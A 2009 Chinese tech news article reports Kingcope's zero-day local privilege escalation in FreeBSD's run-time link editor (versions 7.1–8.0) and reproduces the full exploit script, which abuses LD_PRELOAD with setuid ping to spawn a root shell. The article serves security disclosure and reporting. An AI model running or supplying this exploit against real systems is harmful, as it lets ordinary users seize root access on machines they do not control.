天极传媒:
天极网
比特网
IT专家网
52PK游戏网
极客修
全国分站

北京上海广州深港南京福建沈阳成都杭州西安长春重庆大庆合肥惠州青岛郑州泰州厦门淄博天津无锡哈尔滨

产品
  • 网页
  • 产品
  • 图片
  • 报价
  • 下载
全高清投影机 净化器 4K电视曲面电视小家电滚筒洗衣机
您现在的位置: 天极网 > 软件 > 安全>新闻>FreeBSD爆严重漏洞 专家称是圣诞礼物

FreeBSD爆严重漏洞 专家称是圣诞前的礼物

天极网软件频道2009-12-02 09:41我要吐槽

  12月2日消息 在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。

  在展示该漏洞威力之前,我们科普一下著名黑客kingcope。从2007年6月至今,他一共公开了12个安全漏洞(没公开的不知道有多少),其中 FreeBSD和Sun Solaris各两个,微软四个,Oraclemysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

  接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。

fbsd8localroot

  相关脚本如下:

t  #!/bin/sh
  echo “FreeBSD local r00t zeroday by Kingcope on November 2009″
  cat > env.c << _EOF
  #include
  main() {
  extern char **environ;
  environ = (char**)malloc(8096);
  environ[0] = (char*)malloc(1024);
  environ[1] = (char*)malloc(1024);
  strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);
  execl(”/sbin/ping”, “ping”, 0);
  }
  _EOF
  gcc env.c -o env > /dev/null 2>&1
  #download from baoz.net
  cat > program.c << _EOF
  #include
  #include
  #include
  #include
  void _init() {
  extern char **environ;
  environ=NULL;
  system(”echo ALEX-ALEX;/bin/sh”);
  }
  _EOF
  gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

作者:baoz责任编辑:王健)
请关注天极网天极新媒体 最酷科技资讯
扫码赢大奖
评论
* 网友发言均非本站立场,本站不在评论栏推荐任何网店、经销商,谨防上当受骗!
热点推荐
微软Windows 10操作系统Win10系统在Win8的基础上对界面、特性以及跨平台方面做了诸多优化。[详细]
Windows 10 新视界 [进入频道][使用技巧][微博互动]
手机整机DIY企业级